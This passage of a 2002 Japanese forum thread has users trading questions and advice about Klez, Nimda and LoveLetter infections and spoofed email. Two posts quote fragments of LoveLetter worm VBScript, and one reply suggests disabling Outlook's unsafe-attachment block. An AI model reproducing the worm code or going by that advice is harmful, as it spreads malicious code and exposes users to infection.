80 :ケッケッケッケッ:02/08/03 14:41
>>78
( ´_ゝ`)フーン じゃあ大丈夫と言う事にしておきましょう・・・・

81 :なんでんきゃんでん:02/08/03 14:42
えっ!どういうことですか?

82 :なんでんきゃんでん:02/08/03 14:53
教えてください!

83 :68:02/08/03 15:52
>>76
なるほど。
アドバイス通り、Program Filesに入れてショートカット作成する
ことにします。
ありがとうございました。

84 :名無しさん@お腹いっぱい。:02/08/03 20:27
IPアドレス *** *** *** ***は、ハードウェアのアドレスが** ** **
に設定してあるシステムと競合していることが、検出されました。という表示が現れたのですが、どういうことでしょう!?
全然わからないADSLユーザーです。教えてください。

85 :名無しさん@お腹いっぱい。:02/08/03 20:38
>>84
正確にメッセージ書け
ルータは使っているのか?PCは一台か?

86 :名無しさん@お腹いっぱい。:02/08/03 20:49
>>84
つーか、板違い

87 :名無しさん@お腹いっぱい。:02/08/03 20:49
***の部分は、数字なんです。アドレスがわかると、2ch利用者に公開して
しまうことになると思うので、書けません。PCは、一台です。ADSLモデムを
使用してます。

88 :名無しさん@お腹いっぱい。:02/08/03 20:51
>>87
IPって、どうせ192.168.0.XXXあたりなんじゃないの?
だったら書いても大丈夫だぞ。

89 :名無しさん@お腹いっぱい。:02/08/03 20:55
>>87
だから、ルータを使用しているのかって聞いてるんだろが

IPが何だってんだよ・・・
61.211.46.40 が俺のIPだ。一体、何を恐れる?

90 :名無しさん@お腹いっぱい。:02/08/03 21:02
自分のは127.0.0.1ですた

91 :名無しさん@お腹いっぱい。:02/08/03 21:36
>>89
「ソネット」デツカ
モレノトコト、チガタカライイデツ

92 :3:02/08/03 21:57
http://pcweb.mycom.co.jp/news/2002/08/02/08.html

93 :名無しさん@お腹いっぱい。:02/08/03 22:00
ソースネクストか・・・
フリーウェア以下のソフトしか作れない会社だっけ?

94 :名無しさん@お腹いっぱい。:02/08/03 22:05
>>92
>さらに、新種ウイルスの発生や、Internet Explorerを始め
>とするWindows OSのセキュリティ修正プログラムの更新情報
>を、随時、ポップアップとセキュリティセンター上で表示する。

ナーンカ、、、スパイウェワぽいデツネ。。。

95 :名無しさん@お腹いっぱい。:02/08/03 22:07
>>93
それはフリーウェアの作者に失礼だ

96 :おなかいっぱい。:02/08/04 14:02
キタ━(゚∀゚)━!!初klez!!
遅い?

97 :sage:02/08/04 18:35
このたびめでたく nimda に感染しました。これは該当するウィルスが含まれている *.eml ファイルがディスク上に複数あることを確認したので確実です。

で、普段からウィルススキャンソフトをインストールしていなかった漏れは、「オンラインでスキャンできるやつがあったよなぁ」と思い立ち、 Symantec と TrendMicro のオンラインウィルススキャンを試してみたんです。

そしたら、 Syjmantec のほうは 17 個のウィルス入りファイルを見つけてくれたんですが、TrendMicro の方はなにも見つけてくれませんでした。オンラインなんで、どちらもパターンファイルは最新に近いものが自動的にダウンロードされていると思うんですが…

今まで時々 TrendMicro のオンラインスキャンは使っていたのですが、なんか信用できなくなってしまいました。どうなんでしょ? 友達にはいままで NAV でも買っておけば?といっていただけに、ちょっとショック。

98 :cheshire-cat ◆CATJR.v6 :02/08/04 18:57
>>97
オンラインスキャンとかはさ、Webに接続している間に感染活動を行って新たな被害者が出たりするから、使わない方がいいような気が。。。。

99 :sage:02/08/04 19:23
>>98 そうでつね。この板読んで、どのソフトがいいか検討してみます。
一ヶ月くらいのトライアル版も各社出してくれてるみたいだし。

それにしても、TrendMicro の On-line Scaner が Nimda を見落としたのには参った…

100 :sage:02/08/04 19:31
>>99 Scaner ⇒ Scanner

101 :cheshire-cat ◆CATJR.v6 :02/08/04 20:30
>>99-100
トレンドのオンラインスキャンは、圧縮ファイルでの検出力とかの点で弱いし。
警備隊v3でも書いたけど、ファイルスキャンで検出できなくても常時スキャンで何とかヒットする事もあるんで、インスコしているアンチウイルスソフトに代わるものでは無いっす。

102 :sage:02/08/04 20:39
>>99 Trendmicro の PC-cillin Trial Version ではちゃんと検出されました。

いろんな知り合いに呼ばれて、「ウィルスに感染してないか調べて」って言われるんですが、みんなウィルススキャンソフト持ってない。買えよって言いたくなるんですが、とりあえずその場をしのぐためにオンラインウィルススキャン使ってます。

いままでオンラインウィルススキャンはトレンドマイクロのしか使ったことなかったんですが、しマンテックも併用しよう。てか、マジでちゃんとソフト買おうと思います。しばらく PC-cillin Trial Version を使ってみます。1ヶ月使えるみたいなんで。

持ってないやつには素直にその場で「買え」っていいます。
あと↓とか。
無料ウィルス用ソフトAVP/AVG/Ad簡(その2
http://pc.2ch.net/test/read.cgi/sec/1027400238/l50

103 :cheshire-cat ◆CATJR.v6 :02/08/04 20:57
>>102
漏れ的には。
Norton入れた漏れのパソと、「感染?」パソをLANで直結。
クロスケーブルで繋ぐとなぜかうまくいかなかったりする時は、安ルーター使ってそれぞれプライベートIPアドレスにして、ルーターをゲートウェイにして、WEBに繋がない状態でスキャン。
でも最近では面倒なんで、HD外してスレーブ接続でやってまする。

体験版入れるってのもアリだけど、レトロウイルス(アンチウイルスソフトを落とすvilli)なら、駄目駄目っすけどね。

しかし何故バスターは、体験版はそこそこなのに、オンラインスキャンはいまいちなんでしょうね。謎。

104 :名無しさん@お腹いっぱい。:02/08/05 11:27
製品版を買わせるためなんでは。<オンラインスキャンはいまいち
体験版がしょぼいと買ってくれないだろうから、こっちはそれなりのチェックができるようにしてるとか。

105 : :02/08/05 12:34
>>104 シマンテックはオンラインもかなりイイ!!
そのかわり、ファイル名レポートしてくれるだけで、削除とかはしてくれない。

トレンドマイクロもそうすればいいのにね。
だって、オンラインがしょぼかったら、
もういいや、ほかの会社のにしようと思っちゃうよ。

106 :1:02/08/05 13:02
\LOVE-LETTER-FOR-YOU.TXT.vbs")




107 :名無しさん@お腹いっぱい。:02/08/05 15:12
>>66
お前、何が嬉しくて生きてるんだ?
困ってるやつがいるんだから、邪魔する事はないだろう。
あっちこっち見渡して、陰湿な奴だな。

108 :名無しさん@お腹いっぱい。:02/08/05 15:26
どうでもいいぽ

109 :タスケテ厨房:02/08/05 15:37
数ヶ月前から週一ぐらい定期的に(脳トン曰く)W32.Klez.H@mm付きのメールが来るんですが、毎回脳dの検疫行きになってます。
ヘッダを見るとReceived:の最初がいつも"p****-ip01sizuokaden.shizuoka.ocn.ne.jp"です。
ウザイので弾きたいのですが、メーラも鯖もドメインで弾くのに対応してないようで、直接向こうに言って止めさせたいのですが、
この場合OCNに連絡すればいいんでしょうか?


110 : :02/08/05 15:39
>>109
http://pc.2ch.net/test/read.cgi/sec/1024255721/2-3

111 :109:02/08/05 15:41
>>110
済みません、よく読んでませんでした。逝ってきます。ありがとう。

112 :名無しさん@お腹いっぱい。:02/08/05 16:16
ウイルスが載ってるページです。
http://members.tripod.co.jp/ittekimasu/403.html

113 :名無しさん@お腹いっぱい。:02/08/05 21:02
あの、素人でスイマセンデス・・・
2ちゃんの中のリンクはってあるところ(青い字のトコ)クリックすると全部
ttp://pinktower.comってトコにつながってしまいます。
これってウイルスに感染しちゃったんでしょうか?
だれか助けてください!!

114 :名無しさん@お腹いっぱい。:02/08/05 22:53
>>113
> これってウイルスに感染しちゃったんでしょうか?
「ウイルスに感染しちゃったんでしょうか?」と聞く前にウイルススキャンしろ!


115 :名無しさん@お腹いっぱい。:02/08/06 03:39
2ちゃんをうろついてたら
VBS.LoveLetter.varと言うウィルスに感染してしまいました。
ラヴレター類はノートンで修復できる筈のウィルスと書いてあったのですが
駄目でした・・・。
LoveLetterの次の文字を調べたらvarと言うのは存在して
いないみたいなので新種なんですか?
感染したファイルを削除しようと思ってもできません。
どなたかアドバイスを下さい。


116 :名無しさん@お腹いっぱい:02/08/06 04:14
隔離

117 :名無しさん@お腹いっぱい。:02/08/06 05:42
差出人(From:)がkeisatu <keisatu@npa.go.jp>になってるのがメールで来ました。

添付ファイルもあるのですがアウトルックで「次の添付ファイルは安全でないため。メールからのアクセスが削除されました align.exe,0287_10[1].jpg」と出て内容を確認できません。
このメールは警察って本物なんでしょうか・・
メールヘッダでわかるとしたらどれを載せればよいのでしょう?

ちなみにプロバ(ocn)のアドレスに添付ファイルつきの不思議なメールが多数来てますが怪しさ100%???
http://elsefiz.hypermart.net/cgi-bin1/image/079.jpg

118 :名無しさん@お腹いっぱい。:02/08/06 05:58
>>117
なぜに、前の書き込みとか参照して、オンラインウィルス
スキャンとか、やってから書き込もうとしないわけ?

google で検索したホームページの文言を読むべし。
http://www.jcu.edu.au/office/itr/archives/matlab/msg00024.shtml

……………ところで、今日って klez の発病日じゃないっけ?

119 :名無しさん@お腹いっぱい。:02/08/06 07:52
>>117
警察庁が個人にメールだすか?
なんかホームページで問い合わせたのか?
なけりゃどうしてわざわざメールだすのさ?

120 :名無しさん@お腹いっぱい。:02/08/06 08:02
>>117
添付ファイルを見るには、オプション→セキュリティ→
ウイルスの可能性のある添付ファイルを…のチェックを外す。

メールヘッダの<Return-Path>、Receivedのあたりを見せてみ。

121 :名無しさん@お腹いっぱい。:02/08/06 08:37
>>118
奇数月6日

122 ::02/08/06 10:44
こんにちわ。
 知り合いがプロバイダを7月いっぱいで解約したのですが、
その後8月5日に3つもウィルスらしきメールが来ました。
それも、解約したはずの前のプロバイダーで使っていたアドレス
からです。
 解約したアドレスからメールが来るなんてあるのでしょう
か?
 ちなみにそれぞれ130Kバイトほどのメールです。hotmail
に届いているので、ウィルスかどうかははっきりわかりません
が、明らかにウィルスですよね^^;
 outlookに転送する以外にチェックする方法ってあるんでしょうか?

123 :メールヘッダは?:02/08/06 10:50
>>117

124 :名無しさん@お腹いっぱい。:02/08/06 11:01
>>122
まず削除依頼出して来い

125 ::02/08/06 11:08
絶対出ると思ったw
>>124

126 :名無しさん@お腹いっぱい。:02/08/06 11:12
>>125
思ったんなら出して来い
甘えるな

127 ::02/08/06 11:14
しつけ〜な。
質問に答える知識がないなら無視してくださいよ。

128 :名無しさん@お腹いっぱい。:02/08/06 11:15
>>127
その一言が命取り

129 ::02/08/06 11:17
何がですか?
>>128

130 :名無しさん@お腹いっぱい。:02/08/06 11:33
>>129
うぜーよ、カス。

131 :名無しさん@お腹いっぱい。:02/08/06 11:36
>>130
桜は放置でお願いします

132 :放置って・・・:02/08/06 11:45
結局対策はみんなわかんないのかな〜?

133 :名無しさん@お腹いっぱい。:02/08/06 11:48
次の質問者どうぞ〜

134 :名無しさん@お腹いっぱい。:02/08/06 11:50
>>122
http://pc.2ch.net/test/read.cgi/sec/1024255721/を熟読しなさい。過去ログも

135 :放置って・・・:02/08/06 12:06
まともな人もいるんですね〜^^
>>134

136 :名無しさん@お腹いっぱい。:02/08/06 12:16
>>135
お前以外は全員まとも。
安心しろ。

137 : :02/08/06 13:42
やってもうた!
ローマ字名のメールが来て、なんじゃらホイと右クリックしたら「ぴゅっ!」
て送ったみたい。
 案の定、他社から電話来て「たぶんお宅から送られたと思うんだけどメール感染しました?」
だって...ああー2度目なんだよね。どうしてくれるーっ!!

138 :117:02/08/06 14:26
>>118
すいませぬ・・。

>>120
>メールヘッダの<Return-Path>、Receivedのあたりを見せてみ。
From: keisatu <keisatu@npa.go.jp>
Return-Path: muramoto@dental-city.com

Delivered-To: CLUSTERHOST www.pub.to *********@pub.to
Received: (qmail 19550 invoked from network); 5 Aug 2002 21:11:09 +0900
Received: from ns1.dental-city.com ([210.231.99.197])
(envelope-sender <muramoto@dental-city.com>)
by www.pub.to (qmail-ldap-1.03) with SMTP
for <*********@pub.to>; 5 Aug 2002 21:11:09 +0900
Received: from Zarihvx (p0323-ip02;;;;;;;;;.ocn.ne.jp [61.119.;;;.;;])
by ns1.dental-city.com (8.9.3+3.2W/8.9.3) with SMTP id VAA28500
for <********@pub.to>; Mon, 5 Aug 2002 21:09:11 +0900

ヘッダの見方が全くわかりませんが***@pub.toの転送アドレスに警察庁の名前できてたので素人目にはスゴクびびりました。

http://elsefiz.hypermart.net/cgi-bin1/image/079.jpg

こっちのは試しに添付ファイル開いてみたけどなにもでませんでした(でもウィルスバスターの常駐してた右下のアイコン?が消えちゃって。。)

ホットメールってウィルス対策機能あるって聞いてたけど働いて無いのか・・
過去ログ読んでクレズウィルスの事少しは勉強してきまふ。。

139 :名無しさん@お腹いっぱい。:02/08/06 14:46
>>135には状況がわかってるんだろうか?
>>135のメル友の誰かがクレズにやられて、そいつのアドレス帳に載っていた>>135の古いメアドを騙って、
やはりそいつのアドレス帳に載っていた>>135の新しいメアドにクレズ入りメールを発信しただけの話だ。

140 :名無しさん@お腹いっぱい。:02/08/06 17:06
>>138
だから、Return-Path: のメールアドレスが、感染者のアドレスなの。
symantec とか trendmaicro の解説をちゃんと読め。

klez は、From: を偽装するの。

141 :股、第三者中継:02/08/06 18:16
>>138
Klez?は第三者中継が出来るサーバーを探すのか?

http://www.nanet.co.jp/rlytest/relaytest.html
mail.dental-city.com (pri=10)
<220 ns1.dental-city.com ESMTP Sendmail 8.9.3+3.2W/8.9.3
>HELO rlytest.nanet.co.jp
<250 ns1.dental-city.com Hello ns.nanet.co.jp [210.164.52.3],
pleased to meet you
>MAIL FROM:< TESThttp://www.nanet.co.jp/rlytest/requestedfrom[205.158.62.26]@mail.dental-city.com >
<250 < TESThttp://www.nanet.co.jp/rlytest/requestedfrom[202.77.181.71]@mail.dental-city.com >... Sender ok
>RCPT TO:<rlytest@nanet.co.jp>
<250 <rlytest@nanet.co.jp>... Recipient ok
>QUIT
<221 ns1.dental-city.com closing connection
問題あり:不正な中継を受け付けます。
(210.231.99.197)
ORDB database...登録されています。
maps realtime blackhole list...登録されていません。

210.231.99.197
http://whois.nic.ad.jp/cgi-bin/whois_gw?key=210.231.99.128/25
有限会社 エーアンドピーデータシステムズ (A&P DATA SYSTEMS Inc.)
MAIL-OFFICE [210.231.99.128 <-> 210.231.99.255] 210.231.99.128/25

142 :141の続き:02/08/06 18:19
http://www.ordb.org/lookup/?host=mail.dental-city.com
このホストは ORDB.org に不正中継ホストとして登録されています。
データベースの検索結果: mail.dental-city.com (210.231.99.197)
データベースの検索結果: ns1.dental-city.com (210.231.99.197)
Look up this host in non-ORDB RBL's (May take a while to load)
ORDB.org への初回登録日時: 2001-08-23 16:06 GMT
初回送信ホスト: 202.36.148.21
最終検査日時: 2001-10-25 22:04 GMT
不正中継が確認されたメールのヘッダ情報:
Return-Path:
Delivered-To: marvin@groundzero.ordb.org
Received: from ns1.dental-city.com (unknown [210.231.99.197])
by groundzero.ordb.org (Postfix) with ESMTP id 545B25B1D0
for ; Thu, 25 Oct 2001 22:45:42 +0200 (CEST)
Received: from groundzero.ordb.org (groundzero.ordb.org [62.242.0.190])
by ns1.dental-city.com (8.9.3+3.2W/8.9.3) with ESMTP id FAA16331
for ; Fri, 26 Oct 2001 05:45:39 +0900
Date: Fri, 26 Oct 2001 05:45:39 +0900
Message-Id:< 200110252045.FAA16331@ns1.dental-city.com >
X-ORDB-Envelope-MAIL-FROM:
X-ORDB-Envelope-RCPT-TO:
From: postmaster@ns1.dental-city.com
To: marvin@ordb.org
Subject: ORDB.org check (0.1210261005908250.0448847324) (20)

143 :名無しさん@お腹いっぱい。:02/08/07 20:07
最近急にKlezが届くようになった
しかも宛先不明とヘッダーにある
不覚にもある日ぼ〜〜〜っとしていて開いてしまったよ
今日も4通、また流行りだした?

144 :名無しさん@お腹いっぱい。:02/08/07 21:02
Klez.eに感染しますた。
今、すべてリカバリーし直したんだけど
これで大丈夫かな?
それとも9月5日まで日にちがあったから
業者の人に駆除してもらえば良かったかな?
リカバリーしても駄目ってことはないですよね?
馬鹿ですみませんが教えてください。
ネット上の無料チェックのソフトでやったら
Klezともう一個別なのにも感染してたけど
英語だらけで駆除方法がわからないんだもの。。。


145 :名無しさん@お腹いっぱい。:02/08/07 21:07
>>141
>Klez?は第三者中継が出来るサーバーを探すのか?

スッパマが感染しただけのことヂャネーノ??

146 :cheshire-cat ◆CATJR.v6 :02/08/07 21:08
>>144
EXEファイルとかデータファイル破壊されていなかったなら、駆除ツールで十分だったのに。
リカバリーしてハードディスクをフォーマット後にOSを新規インスコしたなら大丈夫ですが。

>英語だらけで駆除方法がわからないんだもの
アンチウイルスソフトを購入したらどうでしょか。
とりあえずVirus Baster 2002が一番初心者向けでトラブルが少ないです。

147 :144:02/08/07 22:03
>>146
ありがとうございます。
知人からソフト貸してもらって
インストールします。

リカバリー後チェックしたら
もう大丈夫でした。
めちゃ手間がかかったので
これからは、メールには十分注意をしようと思っています。


148 :cheshire-cat ◆CATJR.v6 :02/08/07 22:07
>>144
>知人からソフト貸してもらって
>インストールします。

アンチウイルスソフトは、割れ(というか不正コピー)するとすぐバレたり、どちらかに不具合生じませんでしょか、社会的に。
せいぜい数千円なんで、買えばどうでしょ。

149 :(;´Д`)....。:02/08/07 22:15
>>147
>知人からソフト貸してもらって
>インストールします。

(;゚Д゚)ポカーン.....

150 :名無しさん@お腹いっぱい。:02/08/07 22:32
love letter virusに感染して、なにも知らずに再起動してしまいました。
もうだめなんでしょうか。別のパソコンから書きこんでいます。
泣きそうです。

151 : :02/08/07 22:40
klezに感染したみたいです。
ウィルスバスター買って検索したらあっちこっち繁殖してました。klezて出てました。
元を断たなきゃだめみたいですね。結局、フォーマットして他のドライブに繁殖したファイルを
削除しました。
 実害てどうなんでしょう?良くわかりません。でも迷惑な事はたしかです!

152 :名無しさん@お腹いっぱい。:02/08/07 22:48
>>151
実害?フォーマットして必要なファイルなくさなかったのか?
再インスコでかかった手間はどうだ?そういうことだ。

153 :cheshire-cat ◆CATJR.v6 :02/08/07 22:56
>>150
なぜ、も少し上のレスを読まないんでしょか。

154 :名無しさん@お腹いっぱい。:02/08/07 23:01
>>153
気が動転してるから。

155 :cheshire-cat ◆CATJR.v6 :02/08/07 23:05
>154
貼っときますか。。。。
http://pc.2ch.net/test/read.cgi/sec/1025872269/

156 :名無しさん@お腹いっぱい。:02/08/07 23:12
>>153
>VBS.LoveLetter.var
これによるウィルススキャンソフトの誤作動ってことでしょうか。
そうではなさそうなんです。
WINDOWS\SISTEM32\CONFIG\SISTEM
が壊れてるとでてるので。

157 :名無しさん@お腹いっぱい。:02/08/07 23:35
2chにアクセスした途端、IEのテンポラリがVBS.LoveLetter.varに感染している旨の警告(NAV)が出たんだけど、俺だけ?

158 :名無しさん@お腹いっぱい。:02/08/07 23:38
>>157
皆そう
よく周りを見るべし

159 :名無しさん@お腹いっぱい。:02/08/07 23:39
http://pc.2ch.net/test/read.cgi/sec/1025872269/l50

160 :名無しさん@お腹いっぱい。:02/08/07 23:40
みんなは警告されただけでなんでおれは>>156みたいになってんのYO(泣

161 :名無しさん@お腹いっぱい。:02/08/07 23:43
マサカトオモウケド、、、ラブレタ、htmlにねじ込んでバラマイテルヤシ・・・・

VBS_HAPTIMEミタク・・・・

162 :名無しさん@お腹いっぱい。:02/08/07 23:45
>>160
SYSTEMをSISTEMと書くからじゃないのか?

163 :名無しさん@お腹いっぱい。:02/08/07 23:48
>>162
書き間違いたんだYO!!(泣
もう再インスコするしかないぽ

164 :名無しさん@お腹いっぱい。:02/08/08 00:16
あきらめるなYO!!

165 :名無しさん@お腹いっぱい。:02/08/08 00:39
>>163
害がなけりゃ放置していいんじゃないかな?

166 :名無しさん@お腹いっぱい。:02/08/08 08:18
c.Copy(dirsystem&"\このスレ馬鹿ばっか(w.TXT.vbs")

167 :vanbie:02/08/08 13:30
ここのページみるとノートン博士が毎回・・・です。
スキャンの種類: リアルタイム保護 スキャン
イベント: ウィルスが見つかりました。
ウィルス名: VBS.LoveLetter.Var
ファイル: C:\WINDOWS\Temporary Internet Files\Content.IE5\0X47KN0B\l50[2]
場所: 検疫
コンピュータ: ※※※
ユーザー: ○○○
適用した処理: クリーニング 失敗 : 検疫 正常に完了 : アクセスが拒否されました
検出日: Thu Aug 08 13:27:31 2002

168 :名無しさん@お腹いっぱい。:02/08/08 13:58
>>167
ガイシュツすぎて解説する気にもなれないのは俺だけじゃないはず

169 :名無しさん@お腹いっぱい。:02/08/08 14:03
>>167
とりあえず前スレとか前々スレとか、このスレだったら38あたりでも見たら?

170 :名無しさん@お腹いっぱい。:02/08/08 14:26
2chでスレッドを表示しようとしたらノートンに引っかかりました。
検疫→削除と選択したのですが、書込み禁止のディスクのため削除できませんでした。
推奨とある隔離放置?(問題は広がりませんと表示されました。)したのですが
問題は無いのでしょうか?
アドバイスをお願いします。

171 :170:02/08/08 14:31
すぐ上で出ていましたね。
あせっていたので見落としてしまいました。
申し訳ないです。

172 :名無しさん@お腹いっぱい。:02/08/08 15:17
InterScan VirusWallのパターンファイルは 333(最新のはず)
McAfee VirusScan のパターンファイルは 4.0.4127(最新)
でスルーしてしまいます。

From:詐称。
題名:英文「Worm Kles.E immunity」他。
本文:ナシ。
添付:色々。

来たのは今日の昼、複数来てますんで新種かなと思われますが、
皆さんどうですか?

173 :名無しさん@お腹いっぱい。:02/08/08 15:59
>>172
Kles.Eは初めて聞いたな。
Klez.Eなら山ほど来てるが。

174 :名無しさん@お腹いっぱい。:02/08/08 16:15
>>173
>Kles.Eは初めて聞いたな。
>Klez.Eなら山ほど来てるが

ケーブル抜いて、逝ってきます。

情報が錯綜してる様で、本文もある奴があったらしいです。
対応してる人間が複数いるので。

175 :名無しさん@お腹いっぱい。:02/08/08 16:20
>>174
とりあえずここへ
http://pc.2ch.net/test/read.cgi/sec/1024255721/-100

176 :172,174:02/08/08 16:24
>>175

ありがとうございます。
さっそく確認してみます。

177 :名無しさん@お腹いっぱい。:02/08/09 03:56
助けてください。

↓このページって、ウィルスですかブラクラですか?
http://www.niji.or.jp/home/hs2903/imgboard/img-box/img20020807220521.jpg

178 :名無しさん@お腹いっぱい。:02/08/09 04:44
>>177
はいはいこっちも
http://pc.2ch.net/test/read.cgi/sec/1028559356/202

マルチと

179 :名無しさん@お腹いっぱい。:02/08/09 04:46
マルチするような奴は人柱になりなさいね

180 :名無しさん@お腹いっぱい。:02/08/09 08:58
件名「Let's be friends」ってメールが
添付ファイル付きで届いたんですが。
これもウィルスなんでしょうか
内容は見てません

181 :名無しさん@お腹いっぱい。:02/08/09 09:02
>>180
Klez

っていうか大人しくノートン先生でも買え
これからも毎回ここで聞くつもりか?

182 :180:02/08/09 09:04
>>181
CIHだった

183 :180:02/08/09 09:20
>>182
CIHですか。
よく分からないですがウィルスなんですね
こんなのきたの初めてだったので…
おとなしくノートン先生を買いに逝ってきます。

184 :名無しさん@お腹いっぱい。:02/08/09 09:27
どうやら自分はKlezウィルスに感染してしまったようです。
一応ノートンを使いウィルススキャンをして、
感染ファイルを検疫したのですが、これだけで解決するんでしょうか?心配です。

185 :172(172,174,176):02/08/09 11:09
どうやら不完全なウイルスの様でした。
メールを受信して添付を実行したPCから裏でメールの送信は有りませんでした。

From:詐称。 アドレス帳、inbox辺りから収集
題名:英文、色々。
本文:ナシ又は10行ほどの英文。
添付:色々。感染者のディスクから名前のみ使用。本体はナシ(実行後に確認、0バイト)

メールで感染できないなら、どっかのWebで騙されて落として実行したのかな?

お騒がせしました。

186 :名無しさん@お腹いっぱい。:02/08/09 12:21
>>185
知らないうちにウィルスばらまいてなかったってどうしてわかるの?
それと、たぶんキミの受け取ったメールはプロバイダで感染した添付部分を削除されてる。

187 :172:02/08/09 13:37
>>186

SMTPのログで確認しましたが。

僕が受け取った訳ではなく他の作業者のPCですが。

>>172 で書いているようにInterScanをスルーして来たんですけど。

な に か ?

188 :172:02/08/09 13:47
>>186

>>187 に追加。

ウイルスと思われるメールの送信先プロバイダの対応です。

FAQより
Q. 送信するメールについてウィルスチェックはされないのですか?

A. 受信するメールのみがウィルスチェックの対象となります。

189 :名無しさん@お腹いっぱい。:02/08/09 14:36
さっぱり来てないし
どうでもいいし
キレルなら書き込むな

190 :名無しさん@お腹いっぱい。:02/08/10 20:12
やばいッス。PC起動しないッス。起動画面からジェンジェン動かない!

―――――――――
 マンキンかな?
               / ̄ ̄ ̄ ̄ ̄ ̄
 ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ |  (シラネーヨ)
 日 M [] 0 U U レ―――――――
======〃∧_∧=
 U ∩    %(´∀` )
__ ∧ ∧__∧_∧__.)_  / ̄ ̄ ̄ ̄ ̄
  (   ,,)日(    )∇  < 困ったね。
― /   |―-(    )――  \_____
 (___ノ   ━┳━)
 ━┳━   └┃―・゙
 ̄ ┻ ̄ ̄ ̄ ┻ ̄ ̄ ̄ ̄



191 :112.bmp:02/08/11 09:04
何か分からないけど、気がつくと色んなディレクトリに「112.bmp」という
中身はデスクトップのハードコピーが削除しても勝手に(?)作られてるんだが…。
何か変なウイルスとかの仕業かなぁ???
※注:ノートンとThe Cleanerで検索したが発見されない。。。

192 : :02/08/11 14:09
>>191
そんなウイルスはないよ

193 :名無しさん@お腹いっぱい。:02/08/11 17:45
オンラインウィルスバスターでREG.STARTPAGE〜っていうウィルスを発見して
削除したら、パソコン起動時にエラーの表示が出て直らないので、ファイルを
復元して、結局ウィルスはパソコンの中に入ったままです。
ノートンでスキャンしても引っかからないので困ってます。

194 : :02/08/11 17:53
>>193
一生困っててくれ

195 :名無しさん@お腹いっぱい。:02/08/11 22:31
>>193
これだろ。削除しろとは言われなかったんじゃないか?
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=REG_STARTPAGE.A

196 : :02/08/11 22:39
>>191
一定時間ごとにスナップショット撮るようなソフトが
常駐してるんじゃないの?

197 :名無しさん@お腹いっぱい。:02/08/12 14:05
a funny game
というメールがきた方いらしゃいます?
三日くらい前にも別のウイルスメールと思われるものがきたんですが、
差出人は同じようです。

198 :名無しさん@お腹いっぱい。:02/08/12 15:14
>>197
立派なKlezと思われ。
差出人は偽装してあるから、キレて抗議メールなんかを送ったりしないように。

あとはKlezスレでどうぞ。

199 :FBIへtelnet(・∀・) :02/08/12 17:59
突然マシンがFBI(www.fbi.gov)やwww.army.milや、www.yahoo.comのtelnet、smtp、pop3のポートへアクセスしだした!!!
特別実行ファイルを動かした記憶はないんですが。。。
Outlookも使ってないし、メールを開いたとかじゃあないんです。

どなたか原因となってそうなウイルスとかご存知ないですか???
初心者丸出しでごめんなさい。どなたかご存知中田、お願いします。

200 : :02/08/12 18:01
>>199
ネタはよそで

201 :名無しさん@お腹いっぱい。:02/08/12 18:02
>>199
ウィルススキャンしてみりゃええがな。

202 :名無しさん@お腹いっぱい。:02/08/12 18:30
>>199 へんなアプリケーションダウンロードしたときにインストールされた
んじゃないかな。
オンラインスキャンhttp://www.trendmicro.co.jp/hcall/index.asp
して発見されなかったら、再インストール。

203 :名無しさん@お腹いっぱい。:02/08/12 19:08



メモリ上でウィルスは見つかりませんでした。

スキャンしたファイルの中に 1 つ以上のウィルスが検出されました。

メモ: スキャンを終了する前に中止しました。このコンピュータ上にはさらに感染ファイルがあるかもしれません。

この問題を解決するには:

修復に役立つ総合的なウィルス対策プログラムの購入をご検討ください。
または、次のファイルを削除します:


スキャンを実行していません。 ウィルススキャンを開始するには、 ここをクリック.

c:\WINDOWS\Temporary Internet Files\Content.IE5\89UJ856N\subback[9].html は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\WINDOWS\Temporary Internet Files\Content.IE5\W1AZ49AF\news[4] は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\WINDOWS\Temporary Internet Files\Content.IE5\U5QF8P2V\-100[2] は 次のウィルスに感染しています: VBS.Internal
c:\WINDOWS\Temporary Internet Files\Content.IE5\RYZXYNIY\subback[7].html は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\WINDOWS\Temporary Internet Files\Content.IE5\KPWJS96T\sec[2] は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\WINDOWS\Temporary Internet Files\Content.IE5\0A2IPWXG\news[12] は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\WINDOWS\Temporary Internet Files\Content.IE5\0A2IPWXG\news[13] は 次のウィルスに感染しています: VBS.LoveLetter.Var
どうしたらいいの?

204 :199:02/08/12 19:14
ありがとう。
でもみつからなかた。。。
おとなしく再インストールします。


205 :名無しさん@お腹いっぱい。:02/08/12 19:29
>>203
面倒だ。「ツール」→「インターネットオプション」 から一時ファイルの削除をしろ。
vbsはこのスレでも書かれまくってるのに・・・

206 :名無しさん@お腹いっぱい。:02/08/12 19:31
ニュー速馬鹿は過去ログ読まないって事ですな

207 :名無しさん@お腹いっぱい。:02/08/12 19:33
>>204
ちゃんと必要な設定のバックアップとっとけよ!
てか、それごときで再インスコしてたら・・・
ファイヤーウォール入れてポート閉じておけ!
できんか・・・
使ってるOSくらい書けよな。msconfigでスタートアップを見るとかさ。
Ad-aware使うとか。いろいろ試す楽しみがあるのによ!

208 :名無しさん@お腹いっぱい。:02/08/12 20:22
昨日から、エクスプローラーの最小化、最大化の
ボタンの文字が気持ち悪くなりました。
これはウィルスなのでしょうか?

209 :名無しさん@お腹いっぱい。:02/08/12 20:40
>>208
http://.winfaq.jp/
ここの最初に書いてあります。
ウイルスではないから安心して下さい。

210 :名無しさん@お腹いっぱい。:02/08/12 20:40
>>208
http://.winfaq.jp/
ここの最初に書いてあります。
ウイルスではないから安心して下さい。

211 :219-220:02/08/12 20:42
>>218
http://winfaq.jp/でした。

212 :名無しさん@お腹いっぱい。:02/08/12 20:51
>205
削除しました。

213 :名無しさん@お腹いっぱい。:02/08/12 20:57
>>212
はい、それでもう検出されません。ついでに過去レス読んでおいてね。

214 :名無しさん@お腹いっぱい。:02/08/12 21:34
>213
ういーす。

215 :203:02/08/12 22:43
>213
スキャンしたら
:\RECYCLED\DC10 は 次のウィルスに感染しています: VBS.Internal
c:\RECYCLED\DC12 は 次のウィルスに感染しています: VBS.LoveLetter.Var
c:\WINDOWS\Temporary Internet Files\Content.IE5\G71RM2Z5\index[2].html は 次のウィルスに感染しています: VBS.LoveLetter.Var
